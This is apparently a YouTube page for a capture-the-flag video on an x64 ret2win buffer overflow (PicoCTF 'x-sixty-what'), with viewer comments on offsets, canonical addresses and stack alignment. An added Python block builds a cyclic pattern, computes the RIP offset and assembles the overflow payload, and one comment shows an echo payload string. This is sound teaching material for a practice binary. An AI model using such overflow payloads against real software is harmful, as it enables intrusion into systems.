x64 ret2win - LINUX Buffer Overflow (PicoCTF 2022 #41 'x-sixty-what')

24,606 views

John Hammond


2 years ago


Comments: 45
@MrToast72 1 year ago
"Don't forget guys, don't blindly trust any old code on the internet. That being said, I'm going to blindly trust this code on the internet." I had a real good laugh at this, thank you for your great humor John!
@TheH2OWeb 2 years ago
You're really good at explaining how this works! Thank you John for sharing your knowledge!
@HAGSLAB 2 years ago
I have watched all your earlier binary exploitation videos and this video definitely adds a bit more context and knowledge that I was missing when it comes to x64 and the IP differences. The canonical address stuff makes sense now. Thank you :) I also love that you effed up with the print statement, I do similar stupid stuff all the time 🤦🏻‍♂️😆
@viv_2489 2 years ago
This is brilliant and a very clear explanation... thanks for sharing
@AntonioSouza 2 years ago
I love your videos. Made me understand 64-bit even more.
@DaniSpeh 2 years ago
Very nice. Made me understand 64 bit a lot better
@nuridincersaygili 2 years ago
This is pure gold... thx so much!
@thedailysenior 1 year ago
Thank you John!!
@lordspacecake5565 2 years ago
Very great information!!!
@maesse 1 year ago
Thanks for these videos! My GDB crashed on printf, and googling the error revealed that the issue was that the flag string was not 16 byte aligned. Skipping the opcode "0x40123a push rbp" happens to keep the stack pointer aligned and that's why it worked 🤓
@parthghughriwala6799 2 years ago
Awesome!!!
@grover- 2 years ago
I'd have liked to see you use r2 for this ctf.
@joeborders 1 year ago
Jeff is the real MVP
@Ken-cj1in 2 years ago
Hey man!!
@herrpez 2 years ago
"A gimmick is a novel device or idea designed primarily to attract attention or increase appeal, often with little intrinsic value."
@mellowgeekstudio 1 year ago
Hardly anything to do with the meaning seemed to be intended in this video.
@herrpez 1 year ago
@@mellowgeekstudio Exactly.
@user-hd3pz2ow1b 3 months ago
cool
@beebakrizzle 2 years ago
Very cool! I was struggling with this one and the video was very clearly explained. Quick question: what do you use to run Kali in a VM? My VirtualBox instance is very slow and I have a super beefy computer (32GB RAM, i7 CPU, RTX3080 graphics). I enabled 3D acceleration and put half of the resources available for the box (16GB memory, 8 cpus, max video memory) but it's super slow. Virtualization is enabled in bios. PS: I prefer to use `echo -e "AAAA...\x3b\x12\x40"` for piping input into the binary, I think the python makes it confusing.
@__someone__3141 2 years ago
Maybe you're using an HDD instead of an SSD? It's a very huge difference; make sure to put the VM files on an SSD.
@lfcbpro 1 year ago
I have no idea if this is something that might be significant, I am new to all this, but what I did notice was that my VirtualBox instance ran a lot slower than my VMware instance. I don't know if it is worth a try changing to VMware?
@jraymundotunortiz9138 2 years ago
I saw that the buffer overflow 3 has less than 500 solves, I hope we can get a video about it
@rimantasri4578 1 year ago
Hello, I did exactly the same as it was done in this video, but my attack failed and I don't know why. The only difference between my attack and Hammond's was the flag function's address. In this video it was 0x0000000000401236. Mine was 0x0000000000001191. When I enter an overflow string into my program, it gets a segmentation fault, but the flag function is not called. When I check the changed RIP, it is something different than I have actually inputted, it is something like 0x555555bf-something, but I didn't put these numbers anywhere. Am I missing something?
@taylor8294 2 years ago
32:05 ColdFusion's post says "Examining RSP... so RIP is at offset 120" and John does the same. Why does matching the pattern at RSP give us the offset for RIP? Is it because RSP comes immediately after RIP in memory, and because it's a non-canonical address RIP "gets skipped"? If so, is RSP always immediately after RIP in memory? Thanks
@rabiaawasmi1554 2 years ago
When you hit the leave instruction, the RSP will point to the return address, the same one that will be popped into the RIP.
@rabiaawasmi1554 2 years ago
Also ret seems to not pop that address if it's not canonical.
@taylor8294 2 years ago
@@rabiaawasmi1554 I see, thank you!
@mellowgeekstudio 1 year ago
Video did a terrible job at making that clear.
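The thread above (why the pattern bytes sitting at RSP give the RIP offset) and maesse's note on skipping `push rbp` for stack alignment are worked through below as an added Python example; it is not code from the video or its author. It builds a Metasploit-style cyclic pattern, recovers the offset from the 8 bytes seen at RSP after the crash, and assembles the ret2win payload. The offset 120 and the addresses 0x401236 / 0x40123a are the values quoted in the comments; the function names and the assumption that flag()'s own frame is a multiple of 16 bytes are mine.

```python
import struct

# Metasploit-style cyclic pattern ("Aa0Aa1Aa2..."): every 3-byte triple is
# unique, so any 8-byte window identifies its position in the buffer.
def pattern_create(length):
    out = []
    for u in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in "abcdefghijklmnopqrstuvwxyz":
            for d in "0123456789":
                out.append(u + l + d)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    raise ValueError("pattern longer than 20280 bytes not supported")

# On x64 a non-canonical return address makes `ret` itself fault, so RIP is
# never updated; the pattern bytes are still at RSP, which is exactly the slot
# `ret` would have popped into RIP. Searching for those bytes therefore gives
# the RIP offset. `seen` is the raw 8 bytes (x/s $rsp) or the register value.
def pattern_offset(pattern, seen):
    if isinstance(seen, int):
        seen = struct.pack("<Q", seen)  # register value -> little-endian bytes
    return pattern.encode().find(seen)

FLAG_FUNC = 0x401236            # address of flag() quoted in the comments
FLAG_FUNC_SKIP_PUSH = 0x40123a  # same function, just past its `push rbp`

def build_payload(offset, target):
    """Padding up to the saved RIP, then the target as a little-endian QWORD."""
    return b"A" * offset + struct.pack("<Q", target)

# ret2win enters flag() via `ret`, not `call`, so no return address is pushed
# and RSP lands 8 bytes off from what the prologue expects. printf's SSE code
# (movaps) needs RSP 16-byte aligned, hence the crash maesse saw. Assumption:
# flag()'s frame size is a multiple of 16, so only the entry point matters.
def pick_target(rsp_at_ret):
    """Choose the entry point that leaves RSP 16-byte aligned inside flag()."""
    entry_rsp = rsp_at_ret + 8          # `ret` pops the 8-byte return address
    if entry_rsp % 16 == 8:             # looks like a real call: push rbp realigns
        return FLAG_FUNC
    return FLAG_FUNC_SKIP_PUSH          # already aligned: skipping push keeps it
```

With `pattern_offset(pattern_create(200), b"Ae0Ae1Ae")` returning 120, `build_payload(120, pick_target(rsp))` is the 128-byte input the video pipes into the binary.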
@AmanPatel-rv2it 2 years ago
This one is the longest one
@AwesomeLazyNinja 11 months ago
We need a "gimmick" counter 😂
@samthelamb0718 7 months ago
and a "press the i believe button" counter 😂
@shivasijwali6779 2 years ago
Can someone please explain to me what is
@drewzilla1263 2 years ago
makes it fill the bytes to be the size of QWORD (8 bytes)
@bhagyalakshmi1053 11 months ago
R15?
@mauricekyalo9101 2 years ago
Yt algo things 👍
@bhagyalakshmi1053 1 year ago
Gdb ? Pro? Structured data in structured data
@georgehammond867 2 years ago
How long have you been in this business ....6 years or more?
@bhagyalakshmi1053 1 year ago
What this metta spa
@bhagyalakshmi1053 11 months ago
Rax,rcx, explain
@dom1310df 2 years ago
Given GEF is written in Python, why isn't it just pip installable?
@drewzilla1263 2 years ago
pip is for adding code packages to your Python development environment.
@xerrion 1 year ago
@@drewzilla1263 No, if I for example use `pip install black` I can use black globally and not just in my development environment.
@Sqwince23 2 years ago
It's GIF not GIF...